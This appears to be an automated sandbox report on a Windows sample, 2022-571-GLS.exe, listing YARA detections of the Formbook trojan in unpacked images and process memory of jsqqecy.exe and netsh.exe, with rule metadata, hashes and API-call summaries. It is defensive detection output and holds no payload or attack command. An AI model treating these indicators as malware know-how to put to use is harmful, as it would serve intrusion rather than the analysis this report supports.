          Source: Yara matchFile source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: jsqqecy.exe PID: 1236, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: jsqqecy.exe PID: 1224, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: netsh.exe PID: 6140, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2022-571-GLS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: jsqqecy.exe PID: 1236, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: jsqqecy.exe PID: 1224, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: netsh.exe PID: 6140, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00406333
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00404936
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BDAA0A
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCC520
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BC3540
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BC8ED0
